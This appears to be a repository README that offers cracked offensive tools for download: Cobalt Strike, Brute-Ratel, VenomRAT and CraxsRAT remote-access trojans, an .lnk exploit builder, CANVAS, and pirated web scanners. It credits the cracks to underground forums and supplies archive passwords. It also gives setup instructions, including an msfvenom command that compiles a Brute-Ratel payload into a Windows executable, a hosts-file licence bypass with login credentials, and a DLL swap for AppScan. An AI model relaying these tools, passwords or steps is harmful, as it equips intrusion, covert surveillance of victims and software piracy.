As of 1/27/2024 these tools will not be checked for malware using any sort of environment. You are responsible for any damages done to your computer; run these strictly in a VM environment.
Make sure to read notes at the bottom before opening any issue.
This is a full collection of red teaming tools which have been cracked by other people. If you need me to find anything, let me know via the issues tab.
Sandboxing is useful when it comes to testing whether or not the tools contain malware, and it is strongly recommended to do so depending on the tool size.
Name | Link | Description |
---|---|---|
AnyRun | any.run | A (mostly) free online interactive VM/sandbox, one of the best out there, requires business e-mail, however limited to 5 minutes per sample including a 16MB sample size (Bypassable up to 100-300MB) for free tier accounts |
TRIAGE | tria.ge | A completely free online interactive VM/sandbox, less informative compared to AnyRun, however it needs just a singular log in using any email or even GitHub, with up to a 30-minute sample time limit and no sample size limit. |
HybridAnalysis | hybrid-analysis.com | A completely (login-)free online sandbox, unlike the others it is not interactive, has a 100MB file size limit and has a very long queue to get your file analyzed. |
JoeSandbox | joesandbox.com | Appears to be a fully interactive online VM/sandbox with a 100MB file size limit, however I have never personally used it. |
CUCKOO | cuckoo.cert.ee | A non-interactive completely (login-)free online sandbox, appears to have no file size limit and I have rarely used it personally. |
Tool | Link |
---|---|
Cobalt Strike v4.9 (PW: 20231004_2218) | Download |
Brute-Ratel v1.2.2 (Scandinavian Defense) | Download |
VenomRAT v6.0.1 | Download |
Tool | Link |
---|---|
CraxsRAT v6? ( | Download |
SpyNote is outdated, wait for SpyNote X cracks to surface or use the tool above. |
Tool | Link |
---|---|
Immunity CANVAS v7.27 | Download |
Quantum .lnk Exploit Builder (02-10-22) | Download |
JexBot v1.0 (READ NOTES) | Download |
Tool | Link |
---|---|
Invicti Pro v24.1 | Download |
Burp Suite PRO v2023.6.1 (Install Script) | Download |
Acunetix Scanner v24.1 (Install Script) | Download |
Xray Pro v1.9.10 | Download |
HCL AppScan Standard v10.4.0 | Download |
Tool | Link |
---|---|
Acunetix Scanner v24.1 | Download |
Xray Pro v1.9.11 | Download |
Most of these tools are obtained from CyberArsenal and xss.is, credits for the cracks go to them.
If an archive asks for a password, try `pwn3rzs`, `Pwn3rzs`, `xss.is`, `XSS.IS` or `exploit.in`.
Cobalt Strike requires you to deploy the teamserver on a Linux install such as Ubuntu, or whatever distro of your choice.
In order to run the Cobalt Strike client on your Windows install, you will have to run the following command: `java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -jar cobaltstrike-client.jar`.
On Linux, you can simply run `start.sh`.
I am not sure whether or not this version of Brute-Ratel works properly; it has not been tested at all. However, from the few basic functions I am assuming it works. If it does not, someone let me know.
If Brute-Ratel fails to compile the badger.bin into a badger.exe you can use the following to manually compile it: cat badger.bin | msfvenom -p - -f exe --platform win -a x64 -o badger.exe
This version of CraxsRAT appears to be quite unstable when it comes to connections. If someone wants me to, I can attempt to find a newer version of this RAT.
Immunity CANVAS contains the following: D2 Exploitation Pack v2.55 & White Phosphorus v1.28.
Upon installing AppScan, make sure to replace the installed DLLs with the cracked ones.
- Run add_hosts.bat as administrator. If you get an "Access Denied" error, open "C:\Windows\System32\drivers\etc\hosts" and add the following:
127.0.0.1 jex.tools
127.0.0.1 www.jex.tools
- Run "Jex_crack.exe" and then open "JEX BOT.exe"
- Put `mastercho` as the username and password and press login. Note: After logging into the JexBot, you may close "Jex_crack.exe", however you will have to re-open "Jex_crack.exe" every time you want to open the JexBot.
I am not sure if this is malware, as it is a remake of crax I've found on the xss.is forums going under "Anonymous V6", and it was also leaked according to OP.
Archive password: suspicious
Run strictly in a VM environment.